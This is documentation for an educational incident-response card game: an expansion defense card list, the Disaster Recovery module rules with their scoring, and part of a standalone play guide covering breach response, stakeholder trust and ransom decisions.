Discussion points: - "Can backups be targeted by attackers?" - "What's the difference between backup and disaster recovery?" - "Why would immutable backups be controversial?"


Expansion Defense Card Deck Summary

Card Title Tier Budget Countermeasure
D-25 Application Whitelisting BASIC 10 MALWARE
D-26 Advanced Application Control with AI ADVANCED 15 MALWARE
D-27 Living-Off-The-Land Blocker ELITE 25 MALWARE
D-28 Baseline Behavior Learning System ADVANCED 15 NETWORK
D-29 Process Behavior Analysis ADVANCED 15 MALWARE
D-30 Machine Learning Anomaly Detection ELITE 25 MALWARE
D-31 Container Image Scanning BASIC 10 MALWARE
D-32 Container Runtime Protection ADVANCED 15 MALWARE
D-33 Kubernetes Network Policy & RBAC ELITE 25 NETWORK
D-34 Cloud Configuration Auditing BASIC 10 CREDENTIAL ABUSE
D-35 Cloud Access & Permission Auditing ADVANCED 15 CREDENTIAL ABUSE
D-36 Cloud Compliance & Audit Trail ELITE 25 DATA EXFIL
D-37 Playbook: Ransomware Response ADVANCED 15 MALWARE
D-38 Playbook: Credential Compromise Response ADVANCED 15 CREDENTIAL ABUSE
D-39 Playbook: Insider Threat Response ELITE 25 DATA EXFIL
D-40 Playbook: Supply Chain Breach Response ELITE 25 WEB EXPLOIT
D-41 Backup Strategy - 3-2-1 Rule BASIC 10 MALWARE
D-42 Immutable Backup Storage ADVANCED 15 MALWARE
D-43 Disaster Recovery Plan & Testing ELITE 25 MALWARE

Total Expansion Cards: 19 (D-25 to D-43) Budget Range: 10 (BASIC) to 25 (ELITE) Distribution: 4 BASIC (D-25, D-31, D-34, D-41), 8 ADVANCED (D-26, D-28, D-29, D-32, D-35, D-37, D-38, D-42), 7 ELITE (D-27, D-30, D-33, D-36, D-39, D-40, D-43)


Building Custom Scenarios with Expansion Cards

Template: "Expert Level Scenario"

Setup: - 5-card threat chain (mix of base + expansion threats) - Starting Budget: 120 - Turn Limit: 11 [(5 × 2) + 1, per core rules §3a]

Incident Response Attack Chain Example: 1. Compromised Software Vendor Update (T-13) → MALWARE 2. Lateral Movement via SMB (T-04) → NETWORK 3. Cloud API Token Theft (T-18) → CREDENTIAL ABUSE 4. Disgruntled Employee Sabotage (T-16) → MALWARE 5. Data Exfiltration (T-19: DNS Tunneling) → DATA EXFIL

Incident Response Recommended Defense Starting Hand: - D-31: Container Image Scanning (10) - D-28: Baseline Behavior Learning System (15) - D-34: Cloud Configuration Auditing (10) - D-35: Cloud Access & Permission Auditing (15) - D-37: Playbook: Ransomware Response (15) - reusable

Hardening Strategy: - Deploy D-32, D-33 for container security - Deploy D-36 for cloud audit trails - Deploy D-30 for insider threat detection - Prepare D-39 playbook for insider coordination

Pentester Tactics to Draw (Hardening): 1. PT-07: Supply Chain Compromise (countered by D-31, D-40) 2. PT-02: Malware Evasion - Living-off-the-Land (countered by D-27, D-30) 3. PT-09: Multi-Vector Attack, expansion (countered by D-33, D-35)


Printable Card Layout

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use different color for expansion deck (e.g., teal background vs. white)
  3. Cut along dotted lines
  4. Consider laminating or card sleeves
  5. Store in separate box from base deck

Color Coding Suggestions


Recommended Deck Combinations

Complete Game with All Cards

Recommended Play: Use subsets based on experience level - Beginners: Base deck only - Intermediate: Base + 4 expansion threats (choose scenario) - Advanced: Base + all expansion cards


Quick Integration Checklist


Expansion Defense Card Set for Incident Zero
Use these cards to add modern security controls to your game
For integration guides and teaching notes, see above sections

docs/rules/module-disaster-recovery.md

Disaster Recovery Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025

v2.2: the card system is canonical. The Disaster Recovery game is played with 12 Crisis Action cards (plus ACTION-13), 12 Event cards, and 5 Stakeholder cards. Track advances are deterministic — dice are used only for the optional Justification bonus and ACTION-13's "no guarantee" roll. See cards/disaster-recovery/ for the cards themselves and v2.2 Playtest Edition Changes at the bottom of this document for what changed.


Module Overview

The Disaster Recovery Module teaches crisis management and breach response when incident detection fails. This module is typically entered after losing an Incident Response module (representing an undetected or uncontained breach) but can also be played standalone to teach DR concepts.

This is not a "second chance" to solve the attack chain. Instead, it simulates the real-world consequences of a successful breach: - Crisis management under pressure - Stakeholder communication (board, customers, regulators) - Forensic investigation with limited budget - Public disclosure and legal requirements - Incident containment and damage assessment - Financial impact and recovery costs

Educational Purpose

Incident Response: Teaches proactive threat detection and investigation Hardening (typically after an IR win): Teaches proactive defense and resilience Disaster Recovery (typically after an IR loss): Teaches crisis management, consequences, and recovery


Components (v2.2)

Component Count Purpose
Crisis Action cards (ACTION-01 to ACTION-13) 13 The actions teams play each turn
Event cards (EVENT-01 to EVENT-12) 12 6 Scheduled + 6 Triggered pressure events
Stakeholder cards (STAKE-01 to STAKE-05) 5 Five trust meters (0-100%)
Progress tracks 3 Investigation %, Remediation %, Communication % (0-100%)
d20 1 Optional Justification bonus; ACTION-13 "no guarantee" roll
Track/trust sheets See print pack (coming) — a piece of paper works fine

Money mapping: 1 Budget ≈ $50K. All dollar figures (fines, ransoms) use this mapping unless marked narrative-only.


Entering the DR Phase

Prerequisites for DR Phase

Trigger: Team lost the Incident Response module by either: - Reaching Turn 10 with unrevealed cards remaining, OR - Running out of Budget (reaching 0)

Outcome: The attack chain proceeded undetected. The threat actor succeeded.

(Standalone play: skip Incident Response and start here — see the standalone guide.)

Discovery & Revelation

The Threat Orchestrator reveals the entire unrevealed attack chain to the Blue Team: - All hidden Threat cards are shown - The complete attack progression is explained - The attacker's objectives are stated

Example Revelation: "Your security team was unable to detect the attack in time. The attacker successfully: 1. Sent a phishing email (SOCIAL ENGINEERING) 2. Harvested credentials (CREDENTIAL ABUSE) 3. Moved laterally across your network (NETWORK) 4. Dumped admin credentials (CREDENTIAL ABUSE) 5. Exfiltrated your entire customer database (DATA EXFIL)

The attacker is now threatening to publish the data unless you pay $1M (20 Budget). You have 72 hours before regulators must be notified."


Setup (v2.2)

  1. Establish DR Budget:
  2. Starting DR Budget = 50 (flat crisis allocation — insurance, emergency funds)
  3. If entering from Incident Response: add any remaining IR budget (operational reserves)
  4. If an Audit was played earlier: subtract audit gap penalties (total capped at -30 — see module-audit-compliance.md)
  5. Budget floor is 0. Budget can never go negative; the free Holding Statement action is always available.

  6. Set the three progress tracks to 0%: Investigation, Remediation, Communication.

  7. Set the five stakeholder trust meters to their starting values: Customers 50%, Regulators 60%, Media 40%, Board 70%, Executives 80%. Meters clamp to 0-100%.

  8. Build the Event Timeline: place the 6 Scheduled events on their turns (EVENT-01 Turn 2, EVENT-04 Turn 3, EVENT-03 + EVENT-09 Turn 5, EVENT-02 Turn 6, EVENT-12 Turn 7). Lay the 6 Triggered events face-up where their conditions can be read.

  9. Ransom scenarios: note the ransom deadline (default: start of Turn 5) and put ACTION-13 where the team can see it.

  10. Reputation is NOT tracked during play. It is computed once, at game end (see Final Scoring). During play, the three tracks and five trust meters are the whole state.


The Crisis Clock (v2.2) — ONE clock

The game lasts 8 turns. Each turn is one crisis phase of ~6-12 hours of narrative time:

Turn Narrative Time Key Deadline
1 Detection +6h Internal discovery
2 +12h Internal legal/executive escalation complete (narrative; this was mislabeled a "regulatory deadline" in v2.1 — the regulatory anchor is GDPR 72h)
3 +18h Board Meeting (EVENT-04)
4 +24h Day 1 ends
5 +36h Customer notification recommended (ACTION-09); default ransom deadline (ACTION-13)
6 +48h Regulatory escalation begins (EVENT-02): -10 Regulator trust per un-notified turn
7 +60h Government subpoena (EVENT-12)
8 +72h GDPR 72-hour deadline: ACTION-10 must be complete. Game ends.

All deadlines on every card use this clock. There are no 12-hour, 24-hour, 30-day, or 60-day timers anymore; the former 30/60-day deadlines are deferred final-scoring consequences (see Final Scoring).

(Exception: EVENT-08 Second Breach extends play to Turn 10, once per game. Scoring deadlines do not move.)


Turn Sequence (v2.2)

Each turn:

1. START OF TURN - Complete any in-flight multi-turn action that finishes now (apply its track advance) - Reveal and resolve this turn's Scheduled event - Check all un-fired Triggered events; resolve any whose condition is met - Apply decay/deadline penalties (e.g., Customer decay, Regulator -10/turn from Turn 6 if un-notified)

2. TEAM ACTION (2-3 minutes discussion) - Play ONE Crisis Action card: pay its Budget cost, apply its track advance - Multi-turn actions (Duration N): the card occupies your action slot only on the turn started; its advance completes at the start of the Nth following turn. Only one multi-turn action in flight at a time. - Or take the free Holding Statement (0 Budget, +5% Communication; always available, counts as a Communication action for decay purposes) - Optional Justification bonus (v2.2): if the team gives a strong, specific technical justification for the action, the TO may allow a d20 roll — on 11+, that action's track advance gains +5%. This is the only d20 in track advancement, and it is a bonus, never a gate. - ACTION-13 (Ransom Decision) may be declared at any time before the ransom deadline; it does not use the action slot and happens once per game.

3. APPLY STAKEHOLDER EFFECTS - Apply the played action's trust effects (table below)

4. END OF TURN - Check the loss condition: any stakeholder trust at 0% = immediate loss ("the company collapses") - Advance the turn counter

Action → Trust Effects (v2.2 canonical table)

Action Trust effects when completed
ACTION-01 Forensic Analysis Regulators +10, Board +5
ACTION-02 Threat Hunting
ACTION-03 Log Analysis
ACTION-04 Third-Party IR Regulators +15, Board +15
ACTION-05 Patch & Harden Executives +5
ACTION-06 Containment Executives +5
ACTION-07 Rebuild from Backup Executives +5, Customers +5, Board +5
ACTION-08 Credential Reset Executives +5
ACTION-09 Customer Notification Customers +15, Media +5
ACTION-10 Regulatory Notification Regulators +20
ACTION-11 Media Management Media +20, Customers +10
ACTION-12 Board Communication Board +20, Executives +5
ACTION-13 Ransom Decision — (scoring effects only)
Holding Statement (free) — (stops Customer decay)

Where a Stakeholder card lists a range (e.g., "+2-5%"), this table is the single authoritative value (v2.2).


Deadlines (v2.2)

Deadline Turn If missed
Internal legal/executive escalation End of Turn 2 Narrative only
Customer notification (ACTION-09) End of Turn 5 (recommended) Customer trust -10 per later turn; EVENT-05 Class Action may trigger; never notified = -15 Reputation at final scoring
Ransom decision (ACTION-13) Start of Turn 5 (default; +2 turns if NEGOTIATE) Treated as REFUSE; data-publication event fires
Regulatory notification (ACTION-10) — GDPR 72h End of Turn 8 (escalating from Turn 6) Regulator trust -10 per turn from Turn 6 while un-notified; never notified = -20 Reputation at final scoring (deferred fine)

Ransomware & ACTION-13 (v2.2)

If the scenario includes a ransom/extortion demand, the team must resolve ACTION-13: Ransom Decision before the ransom deadline (default: start of Turn 5). Exactly one option, once per game:

Option Cost Reputation (at scoring) Effect
PAY 20 Budget (≈ $1M) -15 Data-publication event skipped/cancelled; +20% Remediation immediately. No guarantee: TO rolls d20 — on 1-5 the keys don't work: no refund, +0% Remediation (publication stays cancelled).
NEGOTIATE 5 Budget -5 Data-publication event delayed by 2 turns (default: to start of Turn 7).
REFUSE 0 Budget 0 (-20 if the data-publication event later triggers) No payment, no delay.

Data-publication event: if the team has not PAID by the (possibly delayed) deadline, the attacker publishes the stolen data: Customer trust -20, Media trust -15, plus the REFUSE scoring penalty if applicable.

Corrected facts (v2.2): payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage. The FBI discourages payment. Payment guarantees nothing.

Decision Framework for Teams: - Small company, limited budget: may pay (can't afford extended downtime) - Large company, security-conscious: often refuses (sets precedent, funds crime) - Critical infrastructure: may negotiate with government assistance - Regulated industry / sanctioned actor: payment may be legally impossible

Educational Purpose: the ethical and practical considerations of ransom decisions; no "right" answer — it depends on risk tolerance.


Financial Impact Tracking

Immediate Costs (paid from DR Budget, floor 0): - Crisis Action card costs (see the Crisis Action deck) - Event costs (subpoena legal fees, regulatory fine, lost revenue) - Ransom payment or negotiation (ACTION-13)

Deferred/Ongoing Costs (narrative-only; discuss in debrief): - Credit monitoring, legal costs, long-tail regulatory exposure, customer churn - Real-world scale: GDPR fines run up to €20M or 4% of global turnover, whichever is higher; total breach costs typically run to millions

The scoring system captures deferred consequences as Reputation penalties (below) rather than as a parallel money ledger.


Final Scoring (v2.2): Computing Reputation

Reputation is computed once, at game end. The three tracks and five trust meters drive play; Reputation (0-100) is the outcome measure.

FINAL REPUTATION = 100, then apply:

1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
   50-100%  ->  -0
   25-49%   ->  -5
   10-24%   ->  -10
   0-9%     ->  -20

2. STAKEHOLDER TRUST (average of the five meters at game end)
   70%+     ->  +5
   50-69%   ->  0
   30-49%   ->  -10
   below 30 ->  -20

3. DECISION & EVENT MODIFIERS (each applies at most once)
   +5   Customers notified transparently by end of Turn 5 (ACTION-09)
   +3   per completed quality investigation (ACTION-01 or ACTION-04),
        MAX +6 total per game
   -5   ACTION-13 NEGOTIATE          (only one ACTION-13
   -15  ACTION-13 PAY                 modifier can apply)
   -20  ACTION-13 REFUSE and data was published
   -10  EVENT-05 Class Action triggered
   -10  EVENT-06 Regulatory Fine triggered
   -10  EVENT-08 Second Breach triggered
   -15  Customers never notified in-game (deferred statutory violation)
   -20  Regulators never notified in-game (deferred GDPR fine)

4. CLAMP the result to 0-100.

Outcome Tiers (v2.2 — the ONE tier table, identical in the standalone guide)

Final Reputation Outcome Interpretation
85-100 Exemplary Crisis well-managed; stakeholder trust preserved; the organization recovers
70-84 Managed Adequate response; some damage; recovery likely
55-69 Damaged Poor response; significant customer loss; regulatory scrutiny; recovery uncertain
40-54 Mismanaged Major reputational/financial damage; leadership changes likely
Below 40 Catastrophic Company survival in question; CEO likely replaced

Loss Conditions (v2.2 — ONE authoritative list, in precedence order)

  1. Any stakeholder trust meter at 0% at any point = immediate loss. "The company collapses." Nothing else matters.
  2. Otherwise, the game ends after Turn 8 (Turn 10 if EVENT-08 fired) and the outcome is the tier table above.

Below 20% trust is a CRITICAL warning state only — it triggers escalation events but is never itself a loss. The old "<30% trust = loss" rule is removed.

Optional Difficulty Variant: Scope-Scaled Start

Default: the Reputation computation starts at 100 for every game. As a clearly-labelled optional difficulty variant, start the computation lower for bigger breaches:

Scope Records Start computation at
Small (Beginner) ~50K 100 (default)
Medium (Intermediate) ~500K 90
Large (Advanced) 5M+ 80

Worked Example (v2.2, recomputed)

Scenario: "The Ransomware Nightmare" — customer database encrypted and exfiltrated (500K records), ransom demand $1M (20 Budget), publication threatened. Standalone play, default difficulty. Budget 50.

Turn Action (cost) Tracks Events & trust
1 ACTION-02 Threat Hunting (8); justification roll 14 → +5% Inv 20
2 ACTION-06 Containment (8) Rem 15 EVENT-01: no media action yet → Media 40→30. Exec +5 → 85
3 ACTION-10 Notify Regulators (8); declare ACTION-13 NEGOTIATE (5) Comm 10 Customer decay (no Communication action completed yet at start of turn): Customers 50→40. Regulators 60→80. EVENT-04 unprepared (no ACTION-12) → Board 70→50. Publication delayed to start of Turn 7
4 ACTION-05 Patch & Harden (10) Rem 35 No more decay (ACTION-10 completed). Exec +5 → 90
5 ACTION-09 Customer Notification (10) Comm 30 Customers 40→55, Media 30→35. EVENT-03 passed → +5 Rep at scoring. (Private company: skip EVENT-09)
6 Holding Statement (0) Comm 35 EVENT-02: already notified → Regulators +5 → 85. EVENT-08 check: Rem 35 ≥ 30 → does not fire
7 Holding Statement (0) Comm 40 Data published (unpaid): Customers 55→35, Media 35→20. EVENT-12: Exec 90→80, Budget 1→0, Inv +5% → 25
8 Holding Statement (0) Comm 45 Media at 20 (not below 20) → EVENT-07 does not fire. Game ends

Budget spent: 8+8+8+5+10+10 = 49 of 50 (then -5 subpoena fees, floored at 0).

Final state: Tracks: Inv 25, Rem 35, Comm 45. Trust: Customers 35, Regulators 85, Media 20, Board 50, Executives 80 → average 54.

Scoring: - Tracks: Inv 25 (-5), Rem 35 (-5), Comm 45 (-5) → -15 - Trust average 54 → 0 - Modifiers: +5 (transparent customer notification by Turn 5), -5 (NEGOTIATE) → 0 - Final Reputation: 100 - 15 = 85 → Exemplary (barely!)

Lessons visible in the example: the team skipped board prep (Board Meeting hurt), never bought media management (publication nearly triggered a frenzy at Media 20), and threading the ransom deadline with NEGOTIATE bought exactly enough time to notify everyone first. One different choice and this is a 70s game.

Mandatory-path check (v2.2): the cheapest mandatory beats — investigate (ACTION-03: 5), notify regulators (ACTION-10: 8), notify customers (ACTION-09: 10), remediate (ACTION-08: 6) — cost 29 Budget. A stronger path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44. Both fit a 50-Budget team with room for events.


Sample Disaster Recovery Scenarios (v2.2 card sequences)

Scenario: "The Ransomware Nightmare"

See the worked example above. Key tension: ransom decision vs. notification deadlines.

Scenario: "The Insider Data Theft"

Attack chain revealed: disgruntled employee → lateral movement → Mimikatz → insider data theft. Data already for sale on dark web (no ransom demand — skip ACTION-13).

Suggested line of play (Budget 50-60): 1. Turn 1: ACTION-03 Log Analysis (5) — establish the insider's access timeline 2. Turn 2: ACTION-01 Forensic Analysis (12, Duration 2) — evidence for HR/legal/prosecution 3. Turn 3: ACTION-10 Regulatory/Law-Enforcement Notification (8) — FBI referral 4. Turn 4: (forensics completes: +25% Inv, +3 at scoring) ACTION-08 Credential Reset (6) 5. Turn 5: ACTION-09 Customer Notification (10) — transparent disclosure 6. Turn 6-8: ACTION-06 Containment (8), then Holding Statements

Teaching point: insider threats hit Executive and Board trust hardest; internal communication matters as much as external.

Scenario: "The Supply Chain Compromise"

Attack chain revealed: compromised vendor update → lateral movement → cloud API token theft → DNS tunneling exfiltration → persistent C2.

Teaching point: teams quickly realize they cannot finish remediation by Turn 8 — ACTION-07 rebuilds and ACTION-04 third-party IR eat the clock and the budget. That is the lesson: some incidents transition to months-long response. Expect a "Damaged"-tier result even from good play, and debrief why (complex incidents score lower on the same rubric).


DR Phase Outcomes & Debrief

Mandatory Lessons Learned Debrief (20 minutes)

After DR Phase completion, run a structured debrief:

Part 1: Attack Analysis (5 minutes)

  1. What was the initial compromise vector? Why did defenses fail?
  2. How far did the attacker progress? What could have stopped them?
  3. What was the attacker's objective? (Data theft? Ransomware? Persistence?)

Part 2: Detection Failures (5 minutes)

  1. Why wasn't this detected during Incident Response? What signs did we miss?
  2. What defense would have caught this attack?
  3. What monitoring/logging was inadequate?

Part 3: Response Evaluation (5 minutes)

  1. Was the forensic investigation adequate? What gaps remained?
  2. Did we communicate effectively with stakeholders? What went wrong?
  3. Was remediation thorough enough to prevent re-breach? (Did EVENT-08 fire?)

Part 4: Prevention for Next Time (5 minutes)

  1. What one thing would you deploy first if you replayed?
  2. How would you prioritize defenses differently?
  3. What process improvements would help next time?

Comparison: Hardening vs. Disaster Recovery (the two post-IR paths)

Win Incident Response → Hardening

Lose Incident Response → Disaster Recovery


Integration with Base Game: Full Game Flow

Option 1: Standalone Play (Single Path)

Option 2: Full Campaign (Both Paths)

Option 3: Tournament Mode


Teaching Notes for DR Phase

Key Learning Objectives

Incident Response Skills: - Prioritize crisis response actions under pressure - Coordinate across teams and stakeholders - Make decisions with incomplete information - Understand forensic investigation requirements

Business Impact Understanding: - Recognize financial costs of breaches (not just immediate costs) - Understand regulatory & legal consequences - Learn about reputational damage and customer churn - Recognize insurance and recovery programs

Stakeholder Management: - Communicate effectively with diverse audiences (customers, regulators, media) - Balance transparency with liability reduction - Manage expectations during crisis - Follow regulatory notification requirements (the GDPR 72-hour anchor)

Long-term Recovery: - Incident doesn't end when systems are "fixed" - Organizational recovery takes months/years - Prevention is far cheaper than response - Importance of pre-incident preparation

Discussion Questions After DR Phase

For Teams That Had Better Detection (Lost Incident Response by Turn 9-10): - "If you'd detected the attack one turn earlier, what would have changed?" - "What one additional control would have triggered detection?" - "How does dwell time (time from compromise to detection) affect these costs?"

For Teams That Lost Quickly (Out of budget by Turn 5-6): - "Why did your investigation fail so quickly?" - "Which budget-saving action actually cost you more in the long run?" - "What would aggressive early investigation have prevented?"

For All Teams: - "How much did this incident actually cost (total financial + reputational)?" - "If detection during Incident Response saves 80% of these costs, what should you invest in detection?" - "How would a pre-prepared incident response plan have helped?" - "What's the value of having a Disaster Recovery plan before you need it?"

Real-World Context for DR Phase

Average Breach Costs (2023 data; narrative-only): - Detection Time (Dwell Time): 206 days average - Cost per Compromised Record: $4.50 (varies by industry) - Total Average Cost: $4.5M (for 1M records) - Cost Breakdown: Detection & Analysis 25%, Containment & Eradication 20%, Recovery & Restoration 20%, Legal & Regulatory 15%, PR & Communications 10%, Customer Notifications 10%

Common Mistakes in Real Incidents: - Poor forensic planning → Extended investigation costs - Late customer notification → Regulatory fines + brand damage - Inadequate remediation → Re-compromise (in-game: EVENT-08) - Ransom payment → Funds future attacks; doesn't guarantee data deletion - No incident plan → Chaos and poor decisions

Success Factors in Real Incidents: - Pre-incident planning and training - Clear communication protocols - Rapid forensic investigation - Transparent customer communication - Thorough remediation - Post-incident review and improvements


Variants & Extensions

Variant: "Instant Replay" Recovery

If a team scores 85+ (Exemplary), they can attempt a post-game Recovery Analysis: spend 5 remaining Budget for a deep forensic review, identify the systemic failure that allowed the Incident Response loss, and describe the detection investment that would have caught it. Models "turning crisis into opportunity."

Variant: "Ongoing Breach" (Extended Campaign)

Disaster Recovery doesn't necessarily end the incident: Week 2 threat hunting discovers a backdoor still active; Week 4 the attacker tries again; Week 8 a new variant appears. Replay DR with the Second Breach event pre-armed. Teams learn that some breaches have long tails.

Variant: "Insurance & Legal" Module

Add negotiation flavor at debrief: Did the insurer cover this incident? (Many policies restrict or exclude ransom coverage.) How much forensic evidence was preserved for lawsuits? Could you have negotiated the regulatory settlement?


Final Thought: Why This Matters

Incident Response teaches: "Catch attacks early" Hardening (after a win) teaches: "Prevent future attacks" Disaster Recovery (after a loss) teaches: "Plan for what you'll miss"

Together, they create a complete incident response curriculum: 1. Detection & Investigation (Incident Response) 2. Hardening & Prevention (Hardening — win path) 3. Crisis Management & Recovery (Disaster Recovery — loss path)

Students learn that even with perfect security, breaches can happen. The question isn't "Will we be attacked?" but "When we're attacked, will we respond effectively?"


v2.2 Playtest Edition Changes

  1. Card system is canonical. The freeform Actions A-E from v2.1 are replaced by the 13 Crisis Action cards; track advances are deterministic (no success/failure rolls). The optional Justification d20 (11+ → +5%) is the only roll in track advancement; ACTION-13's "no guarantee" roll is the only other die.
  2. One clock: 8 turns, ~6-12 narrative hours each, Turn 1 ≈ detection +6h to Turn 8 ≈ 72h (fixes the v2.1 7×6h = 42h vs. "48 hours" arithmetic). GDPR 72-hour regulatory notification = ACTION-10 by end of Turn 8, escalating penalties (-10 Regulator trust/turn) from Turn 6. Customer notification recommended by Turn 5. The v2.1 "12-hour regulatory deadline" is relabeled as internal legal/executive escalation. The 30-day/60-day event deadlines are re-expressed as deferred final-scoring penalties (-20 / -15 Reputation).
  3. Reputation reconciled with the percent tracks: the three tracks + five trust meters drive play; final Reputation (0-100) is computed once at game end (start 100; track tiers, trust average, decision/event modifiers; clamp 0-100). One outcome tier table (85/70/55/40), identical here and in the standalone guide.
  4. Single values for former contradictions: negotiation reputation effect -5; late-regulator penalty -10/turn; transparent-notification bonus +5; starting reputation flat 100 (scope-scaled 90/80 is an optional difficulty variant); turn count 8.
  5. Event deck procedure: 12 events split into 6 Scheduled (placed on the timeline at setup) + 6 Triggered (fire once when their condition is met). EVENT-08's "additional 7-turn cycle" is now "+2 turns, once per game."
  6. Multi-turn actions defined once: Duration N occupies the action slot only on the start turn; the advance completes at the start of the Nth following turn; one in-flight multi-turn action at a time. ACTION-04's "runs alongside other actions" text was aligned to this rule.
  7. ACTION-13 Ransom Decision added (Pay 20 / Negotiate 5 / Refuse 0, with the exact effects above) — this is the "Negotiation Team" card promised in v2.1.
  8. Bounds & loss: Budget floor 0 (free Holding Statement always available); trust meters and Reputation clamp 0-100; one loss list — any trust meter at 0% = immediate loss, otherwise the tier table. "<30% = loss" removed; "<20%" is a critical warning state only.
  9. Money mapping: 1 Budget ≈ $50K; remaining dollar figures are narrative-only.
  10. Fact corrections: OFAC/insurance wording for ransom payment; GDPR fine = €20M or 4% of global turnover, whichever is HIGHER; California/CCPA "without unreasonable delay" + statutory damages; turnover-scale fines attributed to GDPR-style regimes (not the FTC).
  11. Balance: forensic-quality Reputation bonus capped at +6 per game; mandatory-path cost verified at 29-44 Budget against the 50 starting budget.

Disaster Recovery Phase for Incident Zero For teams that experience the cost of failed detection Emphasizing that response quality matters as much as prevention

docs/standalone-games/disaster-recovery.md

Disaster Recovery Module: Standalone Play Guide

Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Crisis management training, incident response procedures, stakeholder communication

v2.2: the card system is canonical. You play the 13 Crisis Action cards against the 12 Event cards while managing 5 Stakeholder trust meters, over one 8-turn clock. Track advances are deterministic; dice appear only in the optional Justification bonus and ACTION-13's "no guarantee" roll. This guide uses the exact same rules, numbers, and tier table as docs/rules/module-disaster-recovery.md.


Module Overview

The Disaster Recovery Module teaches players how to manage a real breach — investigation, remediation, stakeholder communication, and the ransom decision — under extreme time and budget pressure.

Players balance three progress tracks (Investigation %, Remediation %, Communication %) and five stakeholder trust meters while an event timeline turns up the heat. At the end, a single Reputation score (0-100) is computed from what they achieved.


What You Need

From cards/disaster-recovery/: - 13 Crisis Action cards (ACTION-01 to ACTION-13) - 12 Event cards (6 Scheduled + 6 Triggered) - 5 Stakeholder cards (trust meters) - A d20, and paper for the tracks/trust/budget (tracker sheets: see print pack, coming)

Money mapping: 1 Budget ≈ $50K.


Setup (5 minutes)

1. Set the Crisis Scenario

The breach has already succeeded. The Threat Orchestrator reveals the full attack chain:

"Your organization has experienced a significant data breach. Here's what happened:

Attack Chain: 1. Phishing Campaign → Employee clicked malicious link 2. Credential Harvesting → Login credentials captured 3. VPN Access → Attacker gained network access 4. Lateral Movement → Access to production servers 5. Database Exfiltration → 500,000+ customer records stolen

Current Status: - Breach detected; the crisis clock starts now - Attacker demanding $1M ransom (= 20 Budget) or they publish the data - Media starting to ask questions - You have 8 turns (72 narrative hours) to respond

Your Challenge: Investigate the breach, remediate it, and communicate with stakeholders — before the deadlines land."

2. Blue Team Setup

3. Build the Event Timeline (place on table)

Turn Time Scheduled Event / Deadline
1 +6h Internal discovery
2 +12h EVENT-01 First Media Coverage; internal legal/executive escalation complete (narrative)
3 +18h EVENT-04 Board Meeting
4 +24h
5 +36h EVENT-03 Customer Notification Window (ACTION-09 recommended by end of this turn); EVENT-09 Shareholder Pressure (public companies); default ransom deadline (ACTION-13)
6 +48h EVENT-02 Regulatory 72h Deadline — escalation begins (-10 Regulator trust per un-notified turn)
7 +60h EVENT-12 Government Subpoena (medium/large breaches)
8 +72h GDPR 72-hour deadline: ACTION-10 must be complete. Game ends.

Lay the 6 Triggered events (EVENT-05, -06, -07, -08, -10, -11) face-up where their trigger conditions can be read. Each fires once, when its condition is met.

4. Optional Difficulty Variant: Scope-Scaled Start (clearly optional)

Default: the final Reputation computation starts at 100. For harder games:

Scope Records Start computation at
Small (Beginner) ~50K 100 (default)
Medium (Intermediate) ~500K 90
Large (Advanced) 5M+ 80

Gameplay Loop (25-35 minutes)

Turn Sequence

1. START OF TURN - Complete any in-flight multi-turn action that finishes now (apply its track advance) - Resolve this turn's Scheduled event; check all un-fired Triggered events - Apply decay/deadline penalties (Customer decay from Turn 3 if no communication yet; Regulator -10/turn from Turn 6 if un-notified) - Announce remaining Budget, tracks, and trust meters

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Play ONE Crisis Action card: pay its cost, apply its track advance — or take the free Holding Statement (0 Budget, +5% Communication) - Multi-turn actions (Duration N): occupy the action slot only on the turn started; the advance completes at the start of the Nth following turn; one in flight at a time - Justification bonus (optional): strong, specific technical justification → roll d20; on 11+ that action's advance gains +5% - ACTION-13 Ransom Decision may be declared at any time before the ransom deadline; it does not use the action slot (once per game)

3. APPLY STAKEHOLDER EFFECTS - Apply the action's trust effects (table below)

4. END OF TURN - Any stakeholder trust at 0% = immediate loss ("the company collapses") - Advance the turn counter; the game ends after Turn 8 (Turn 10 if EVENT-08 fired)

Crisis Action Quick Reference (identical to the cards)

Card Category Cost Advance Duration Trust effects
ACTION-01 Forensic Analysis Investigation 12 +25% Inv 2 turns Regulators +10, Board +5
ACTION-02 Threat Hunting Investigation 8 +15% Inv 1 turn
ACTION-03 Log Analysis Investigation 5 +10% Inv 1 turn
ACTION-04 Third-Party IR Investigation 20 +30% Inv, +20% Rem 3 turns Regulators +15, Board +15
ACTION-05 Patch & Harden Remediation 10 +20% Rem 1 turn Executives +5
ACTION-06 Containment Remediation 8 +15% Rem 1 turn Executives +5
ACTION-07 Rebuild from Backup Remediation 15 +25% Rem 2 turns Exec +5, Cust +5, Board +5
ACTION-08 Credential Reset Remediation 6 +12% Rem 1 turn Executives +5
ACTION-09 Customer Notification Communication 10 +20% Comm 1 turn Customers +15, Media +5
ACTION-10 Regulatory Notification Communication 8 +10% Comm 1 turn Regulators +20
ACTION-11 Media Management Communication 12 +15% Comm 1 turn Media +20, Customers +10
ACTION-12 Board Communication Communication 9 +12% Comm 1 turn Board +20, Executives +5
ACTION-13 Ransom Decision Crisis Decision 0/5/20 Pay: +20% Rem Instant — (scoring only)
Holding Statement (free rule) Communication 0 +5% Comm 1 turn — (stops Customer decay)

The Ransom Decision (ACTION-13)

Declare before the ransom deadline (default: start of Turn 5). One option, once per game:

Data-publication event: if the team has not PAID by the (possibly delayed) deadline: Customer trust -20, Media trust -15, plus the REFUSE penalty if applicable.

Facts: payment may violate OFAC sanctions if the actor is sanctioned; many insurers restrict or exclude ransom coverage; the FBI discourages payment; payment guarantees nothing.


Deadline Management (the only clock)


Scoring & Final Reputation (identical to the module rules)

At game end, compute Reputation:

FINAL REPUTATION = 100 (or 90/80 with the scope variant), then apply:

1. TRACK RESULTS (per track: Investigation, Remediation, Communication)
   50-100% -> -0    |  25-49% -> -5   |  10-24% -> -10  |  0-9% -> -20

2. STAKEHOLDER TRUST (average of the five meters)
   70%+ -> +5  |  50-69% -> 0  |  30-49% -> -10  |  below 30% -> -20

3. DECISION & EVENT MODIFIERS (each at most once)
   +5   Customers notified transparently by end of Turn 5
